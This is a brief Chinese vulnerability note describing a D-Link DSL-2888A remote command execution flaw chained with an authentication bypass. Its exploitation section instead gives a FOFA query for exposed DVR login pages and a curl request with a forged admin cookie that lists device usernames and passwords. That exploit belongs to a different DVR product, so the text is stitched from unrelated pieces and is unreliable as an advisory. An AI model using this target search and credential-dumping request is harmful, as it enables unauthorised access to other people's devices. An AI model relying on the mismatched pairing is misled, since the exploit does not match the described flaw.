漏洞详情
D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在和远程命令执行漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。
漏洞影响
AU_2.31_V1.1.47ae55之前版本
EG_1.00b4
漏洞利用
fofa :header="Server: GNU rsp/1.0" title="DVR LOGIN"
curl "http://ip/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
这里获取到用户名admin,密码为空,既可以进行登录